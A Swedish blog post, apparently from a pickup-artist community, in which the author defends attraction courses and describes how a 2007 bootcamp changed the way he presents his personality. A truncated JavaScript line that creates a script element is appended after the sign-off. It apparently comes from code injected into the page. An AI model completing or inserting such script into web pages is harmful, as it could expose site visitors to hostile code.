“Är killar så desperata att de behöver gå en kurs för att lära sig ragga?”
Det är bara två av de frågor som jag får höra väldigt ofta när det med attraktionsexperter kommer upp.
Jag kan förstå att om man inte känner till vad vi håller på med så föraktar man det. Och det är ju så med allt, människan har en försvarsmekanism som gör oss rädda och negativa mot saker vi inte känner till för att vi inte ska ge oss in på något farligt. Inget mer än överlevnadsinstinkt, och nu när vi ändå har kommit in på psykologi så ska jag berätta för er eller påminna er som redan kan detta om en mycket viktig sak som många lämnar bort när man ställer ovannämnda frågor.
Det är nämligen så att människan födds med ett visst beteende som hon/han ärver av sina föräldrar. Men det är inte allt. Man födds inte med en psykisk störning som gör att man blir en massmördare eller liknande. Utan miljön spelar en lika stor roll om inte större i formningen av människas personlighetsdrag och Jaget. Det handlar om betingning/stimulans som vi får redan när innan vi födds, genom hörseln, och fram tills idag.
Kan man då ändra på en människa? Självklart, men det krävs ett enormt arbete som måste vara mycket vältänkt och välgenomfört för att den ska lyckas. Det är därför psykisk behandling, av alla slag, brukar ta så lång tid.
Vad får vi reda på i texten ovan? Jo, att vi inte ändras riktigt, vi är fortfarande oss själva! Nu ska jag vara personlig och ärlig med er för en stund och delge lite av mina upplevelser.
November 2007 tog jag bootcamp i Malmö med CR. Innan det har jag alltid varit social, utåtriktad, omtyckt och populär bland alla. Men jag var inte tillräckligt attraktiv. Jag hade många tjejkompisar, och de flesta var ihop med en kille som jag tyckte var en idiot. De behandlade mina tjejkompisar dåligt och jag satt där och inte förstod hur man kan behandla tjejer så dåligt. Främst var mina tankar, hur kan mina tjejkompisar vara kära i idioter och jag som är “den bästa killen de känner” inte får något?
Då tog jag tag i det och gick bootcampen, efter att ha hängt på forumet sedan den startades. Där insåg jag att det hela, för mig, handlar om alpha-konceptet. Jag behövde inte jobba upp min sociala förmåga så jättemycket. Efter bootcampen tog jag på mig kläder jag aldrig hade gjort innan, inget galet men mina föräldrar märkte den förändringen. Jag hade aldrig tagit på mig ett armband innan, aldrig tagit på mig tajta byxor innan, det är därför de märkte det.
Kläderna är obetydliga till den förändringen jag har genomgått nu. För nu vet jag vad jag ska servera tjejerna med. Det är inte någon kass raggningsreplik, ingen neg m m. Det är att jag ska leverera min personlighet fullt ut och visa de attraktiva sidorna som finns i en man. Visa att jag står för mina åsikter, visa att jag bryr mig om mina nära och kära osv. (för vidare läsning på alfakonceptet hänvisar jag till artikeln skriven av TheMan, länk längst ner på sidan).
The question remains to be answered: har jag ändrat på min personlighet? Definitivt, men inte mycket, och inget negativt. Det viktigaste är att jag levererar min personlighet på ett attraktivt sätt.
Sen är min fråga till er: Om en kille är en total nörd, som har dåligt självförtroende och har blivit med tiden inåtvänd och introvert människa, tack vore negativ förstärkning, och är totalt socialt okalibrerad är en attraktiv kille eller?
Hoppas jag har uttryckt mig klart och tydligt för att ni ska förstå att jag inte ändrar på min personlighet för att bli attraktiv utan jag ändra på sättet jag levererar min personlighet för att vara en attraktiv man.
Länk till alfakonceptet.
Peace, love & respect/ Kad

var d=document;var s=d.createElement(‘script’);